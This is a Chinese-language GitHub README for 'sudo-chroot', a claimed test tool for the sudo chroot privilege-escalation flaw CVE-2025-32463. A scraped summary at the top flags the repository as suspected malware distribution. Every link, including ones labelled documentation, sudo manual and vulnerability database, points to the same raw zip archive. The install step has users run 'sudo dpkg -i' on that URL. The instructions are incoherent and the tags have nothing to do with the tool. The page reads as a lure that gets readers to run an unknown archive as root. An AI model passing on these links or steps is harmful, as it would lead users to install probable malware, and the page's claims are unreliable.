Precault47/sudo-chroot
GitHub: Precault47/sudo-chroot
声称利用 sudo chroot 选项漏洞(CVE-2025-32463)进行本地权限提升测试,但仓库结构疑似恶意软件分发。
Stars: 1 | Forks: 1
# 🔒 sudo-chroot - 简单的 Sudo 漏洞测试工具
## 🚀 入门指南
欢迎使用 **sudo-chroot**!该工具可帮助您测试 Linux 系统上 sudo 命令中的特定安全漏洞。它让您了解标记为 CVE-2025-32463 的漏洞是如何被利用的。
## 📥 下载与安装
首先,您需要下载该应用程序。访问此页面进行下载:[发布页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)

### 下载说明
1. 点击上方链接进入发布页面。
2. 找到那里列出的最新版本。
3. 点击适合您操作系统的资产文件。例如:
- 对于 Ubuntu,下载 `.deb` 文件。
- 对于 Kali Linux,请点击相应的链接进行安装。
4. 将文件保存到您的计算机。
## 🖥️ 系统要求
在运行 **sudo-chroot** 之前,请确保您的系统满足以下要求:
- Linux 操作系统(推荐 Ubuntu 或 Kali Linux)
- 至少 1 GB RAM
- 系统上已安装 Python 3.x
## 🔧 如何运行
下载应用程序后,请按照以下步骤操作:
1. 在您的 Linux 系统上打开一个终端窗口。
2. 导航到您保存下载文件的文件夹。您可以使用 `cd` 命令:
cd /path/to/downloaded/file
3. 对于 Ubuntu,如果您下载了 `.deb` 文件,请使用以下命令进行安装:
sudo dpkg -i https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip
4. 如有必要,使用以下命令解决任何依赖问题:
sudo apt-get install -f
5. 最后,输入以下命令运行应用程序:
sudo-chroot
## ⚙️ 配置工具
**sudo-chroot** 可能需要一些配置才能有效工作。以下是一些您可以调整的基本设置:
- **日志记录:** 您可以启用日志记录以跟踪工具执行的操作。为此,请编辑位于 `https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip` 的配置文件。
- **测试选项:** 选择您想要执行的测试级别。将配置文件中的 `test_mode` 调整为 `basic`、`advanced` 或 `custom` 等设置。
## 🌐 其他用法
运行 **sudo-chroot** 后,您可以开始测试漏洞。请按照屏幕上的说明操作,或参考内置帮助了解具体命令。
### 示例命令
- 启动漏洞测试:
sudo-chroot test
- 检查更新:
sudo-chroot update
## ❓ 故障排除
如果您遇到问题,请考虑以下步骤:
1. 确保您安装了正确版本的 Python。
2. 验证是否满足所有依赖关系。使用命令:
sudo apt-get check
3. 检查 `https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip` 中的日志,查看是否有任何错误消息。
## 💬 社区支持
加入讨论并向其他用户寻求帮助。您可以在仓库的 Issues 部分与我们交流,或者查看是否已有类似问题的解决方案。
## 📚 资源
- [官方文档](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)
- [Linux Sudo 手册](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)
- [漏洞数据库](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)
如有问题或反馈,请在我们的 [GitHub 页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)上提交 issue。
## 🔗 再次下载
请记住,您可以随时返回发布页面重新下载。只需点击此链接:[发布页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)
祝测试愉快!
标签:chroot, CSV导出, Cutter, CVE-2025-32463, Exploit, LPE, Python, Sudo, Web报告查看器, 协议分析, 子域名枚举, 攻击脚本, 无后门, 本地提权, 权限提升, 系统安全, 网络安全, 逆向工具, 隐私保护